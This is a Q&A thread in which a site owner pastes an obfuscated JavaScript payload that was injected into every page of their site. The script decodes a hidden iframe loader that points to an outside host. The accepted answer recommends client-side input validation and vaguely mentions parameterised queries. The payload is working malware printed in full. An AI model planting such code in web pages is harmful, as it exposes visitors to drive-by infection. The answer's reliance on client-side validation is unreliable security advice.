# Javascript injections in my website

Tags: sql, html-injections

As i am new to this concept called sql injections and javascript injections into the code. Some one is keep on attacking with a piece of code into my each and every php page. The attacker is constantly attacking with this code and the site shows "Malware Detected" like that. The injected code is like this

```
<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}
n="3.5~3.5~51.5~50~15~19~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~19.5~60.5~5.5~3.5~3.5~3.5~51.5~50~56~47.5~53.5~49.5~56~19~19.5~28.5~5.5~3.5~3.5~61.5~15~49.5~53~56.5~49.5~15~60.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~58.5~56~51.5~57~49.5~19~16~29~51.5~50~56~47.5~53.5~49.5~15~56.5~56~48.5~29.5~18.5~51~57~57~55~28~22.5~22.5~57~56~47.5~50~50~21.5~51~51.5~57~56.5~24.5~24~25.5~22~51.5~54~22.5~53~54.5~53~22.5~51.5~54~49~49.5~59~22~55~51~55~18.5~15~58.5~51.5~49~57~51~29.5~18.5~23.5~23~18.5~15~51~49.5~51.5~50.5~51~57~29.5~18.5~23.5~23~18.5~15~56.5~57~59.5~53~49.5~29.5~18.5~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~28~51~51.5~49~49~49.5~54~28.5~55~54.5~56.5~51.5~57~51.5~54.5~54~28~47.5~48~56.5~54.5~53~57.5~57~49.5~28.5~53~49.5~50~57~28~23~28.5~57~54.5~55~28~23~28.5~18.5~30~29~22.5~51.5~50~56~47.5~53.5~49.5~30~16~19.5~28.5~5.5~3.5~3.5~61.5~5.5~3.5~3.5~50~57.5~54~48.5~57~51.5~54.5~54~15~51.5~50~56~47.5~53.5~49.5~56~19~19.5~60.5~5.5~3.5~3.5~3.5~58~47.5~56~15~50~15~29.5~15~49~54.5~48.5~57.5~53.5~49.5~54~57~22~48.5~56~49.5~47.5~57~49.5~33.5~53~49.5~53.5~49.5~54~57~19~18.5~51.5~50~56~47.5~53.5~49.5~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~56.5~56~48.5~18.5~21~18.5~51~57~57~55~28~22.5~22.5~57~56~47.5~50~50~21.5~51~51.5~57~56.5~24.5~24~25.5~22~51.5~54~22.5~53~54.5~53~22.5~51.5~54~49~49.5~59~22~55~51~55~18.5~19.5~28.5~50~22~56.5~57~59.5~53~49.5~22~58~51.5~56.5~51.5~48~51.5~53~51.5~57~59.5~29.5~18.5~51~51.5~49~49~49.5~54~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~55~54.5~56.5~51.5~57~51.5~54.5~54~29.5~18.5~47.5~48~56.5~54.5~53~57.5~57~49.5~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~53~49.5~50~57~29.5~18.5~23~18.5~28.5~50~22~56.5~57~59.5~53~49.5~22~57~54.5~55~29.5~18.5~23~18.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~58.5~51.5~49~57~51~18.5~21~18.5~23.5~23~18.5~19.5~28.5~50~22~56.5~49.5~57~31.5~57~57~56~51.5~48~57.5~57~49.5~19~18.5~51~49.5~51.5~50.5~51~57~18.5~21~18.5~23.5~23~18.5~19.5~28.5~5.5~3.5~3.5~3.5~49~54.5~48.5~57.5~53.5~49.5~54~57~22~50.5~49.5~57~33.5~53~49.5~53.5~49.5~54~57~56.5~32~59.5~41~47.5~50.5~38~47.5~53.5~49.5~19~18.5~48~54.5~49~59.5~18.5~19.5~44.5~23~45.5~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=583;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>
```

Can anyone guide how the attacker is constantly attacking onto each and every page. Mine is a high traffic web site. Any suggestions are highly appriciated.

Regards,
phphunger...

Answer (score 2, accepted):

You also read

[**What is SQl Injection ?**](http://en.wikipedia.org/wiki/SQL_injection)  and [**HTML and JavaScript Injection**](http://www.codeproject.com/Articles/134024/HTML-and-JavaScript-Injection) this two article help you to understand concept as well as gives you an idea how to deal with this...

If you want to stop than than start putting vlidation on your input control

1. Validate each and every input control of your screen using javascript  i.e which dont allow to enter any special charter in your input box. To validate this you find out no of example on google which stops javascript as well as sql injection.
2. Make use of parameter which stops sql injection in your site , Prameter means when you are performing any action on your database create prodeucrue with parameter and spply this parameter values to your procuedre from the code which stops sql injection..